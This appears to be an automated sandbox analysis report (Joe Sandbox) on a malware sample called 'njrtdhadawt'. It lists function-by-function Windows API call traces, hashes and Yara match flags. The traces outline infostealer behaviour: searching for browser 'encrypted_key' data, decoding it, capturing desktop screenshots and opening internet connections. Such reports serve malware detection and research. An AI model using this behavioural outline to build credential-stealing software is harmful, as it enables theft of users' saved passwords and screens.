                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                          • String ID: block
                                                                                                                                                                                                                                                          • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                          • Opcode ID: d8e5aa81435c20382a1671c8f6e1b9507b99018f2856678f7176ffa6c9486bf1
                                                                                                                                                                                                                                                          • Instruction ID: f5cda09aab5c5357a8b48cfe8d2d810bbb866ff07fdc5ee2f5db86b88841afad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8e5aa81435c20382a1671c8f6e1b9507b99018f2856678f7176ffa6c9486bf1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC412FB1A4460EEFCB205F71EC49A7E7F68BF40B49B508429E742EA518E734A611EB50
                                                                                                                                                                                                                                                          Function 6CD52D00 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 232libraryloaderCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 6CD52D19
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CD52D49
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CD52D7C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6CD52DE1
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CD52E0A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                                                                          • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                                                                                                                                                                                                                          • API String ID: 2190909847-1953985048
                                                                                                                                                                                                                                                          • Opcode ID: 8b6208bfa73736ebd6fb7dfac1978a265c11af9c9bdd5f5666560c0a5cebc774
                                                                                                                                                                                                                                                          • Instruction ID: a668a4a1ba0d88e82470fc974a9a2df9413c230d0e55ea10ed351eaa843fe225
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b6208bfa73736ebd6fb7dfac1978a265c11af9c9bdd5f5666560c0a5cebc774
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41A16270608781EBEB218F19C885BDBB7F8FF89318F40461DF69897260E772D5458B92
                                                                                                                                                                                                                                                          Function 00FF59EA Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5A22
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5A33
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00FF5A5E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5A7C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00FF5A90
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5AA3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FB5: GetFileAttributesA.KERNEL32(?,?,?,00FEDC33,?,?,?), ref: 00FF1FBC
                                                                                                                                                                                                                                                            • Part of subcall function 00FE87ED: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8833
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF240A: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00FF5B39,?), ref: 00FF2415
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000), ref: 00FF5B47
                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00FF5C69
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86AE
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: LocalAlloc.KERNEL32(00000040,?,?,?,00FE6716,?), ref: 00FE86BC
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86D2
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: LocalFree.KERNEL32(?,?,?,00FE6716,?), ref: 00FE86E1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF5BF5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01015637), ref: 00FF5C12
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF5C31
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01015A74), ref: 00FF5C42
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4109952398-0
                                                                                                                                                                                                                                                          • Opcode ID: 01376aeb6a5f0744accc40adfa1c3aacc59d38c1e6791ee07d32ed401e5681ba
                                                                                                                                                                                                                                                          • Instruction ID: 43586fbd64a709da6f36c1259955fe695e2d8d6697c1ca35761a4d0ff3639890
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01376aeb6a5f0744accc40adfa1c3aacc59d38c1e6791ee07d32ed401e5681ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8712C72C0021D9FDF60DF24DC45ADAB7BABF98310F0445E5E608A3251EB369BA59F50
                                                                                                                                                                                                                                                          Function 00FF2178 Relevance: 18.1, APIs: 12, Instructions: 147COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FF21B9
                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00FF21C7
                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00FF21D4
                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00FF2201
                                                                                                                                                                                                                                                          • GetHGlobalFromStream.COMBASE(?,?), ref: 00FF226C
                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(?), ref: 00FF2275
                                                                                                                                                                                                                                                          • GlobalSize.KERNEL32(?), ref: 00FF2281
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5474: lstrlenA.KERNEL32(?), ref: 00FE550B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5474: StrCmpCA.SHLWAPI(?,010159C7,010159C6,010159C3,010159C2), ref: 00FE557A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5474: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE559C
                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00FF22DF
                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00FF22FA
                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00FF2303
                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00FF230B
                                                                                                                                                                                                                                                          • CloseWindow.USER32(00000000), ref: 00FF2312
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1802806997-0
                                                                                                                                                                                                                                                          • Opcode ID: b1b8791a8d2e1fc6d293ac4aac69a1d09fc8499f143b8516903854be70e2a675
                                                                                                                                                                                                                                                          • Instruction ID: 874a4d690d5af6738339d7d93fb499c87d48d678da5f54ecb025367c9e3c8a08
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1b8791a8d2e1fc6d293ac4aac69a1d09fc8499f143b8516903854be70e2a675
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51E37280011DAFDF21AFA4ED4D8EEBF79FF48324B008025FA01E2125DB359955EBA1
                                                                                                                                                                                                                                                          Function 010085B4 Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3833677464-0
                                                                                                                                                                                                                                                          • Opcode ID: ce53d4cff9f1dcb3a0d7abed448cf11e50c7d1aa652ec336a3e96af6f28d0277
                                                                                                                                                                                                                                                          • Instruction ID: 0fbd5c46e073876282d56688fbcb53ee87c61b264eae20f70529560291291874
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce53d4cff9f1dcb3a0d7abed448cf11e50c7d1aa652ec336a3e96af6f28d0277
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE210531508606AEF7237F68DC0196A7BE5FF96761F11842AF6C45A1E0EE3298008A56
                                                                                                                                                                                                                                                          Function 00FE15D6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FE15AC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00FE15B6
                                                                                                                                                                                                                                                            • Part of subcall function 00FE15AC: HeapAlloc.KERNEL32(00000000), ref: 00FE15BD
                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00FE15F6
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00FE15FC
                                                                                                                                                                                                                                                          • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00FE1604
                                                                                                                                                                                                                                                          • GetWindowContextHelpId.USER32(00000000), ref: 00FE160B
                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,00000000), ref: 00FE1613
                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00000000), ref: 00FE161A
                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00FE1621
                                                                                                                                                                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 00FE1628
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FE1634
                                                                                                                                                                                                                                                          • IsDialogMessageW.USER32(00000000,00000000), ref: 00FE163C
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE1646
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FE164D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3627164727-0
                                                                                                                                                                                                                                                          • Opcode ID: a5a4fce1449d9a67d1a246572ff4039ae6d6a4a3f00d3a161e3f75d60ea6ab3a
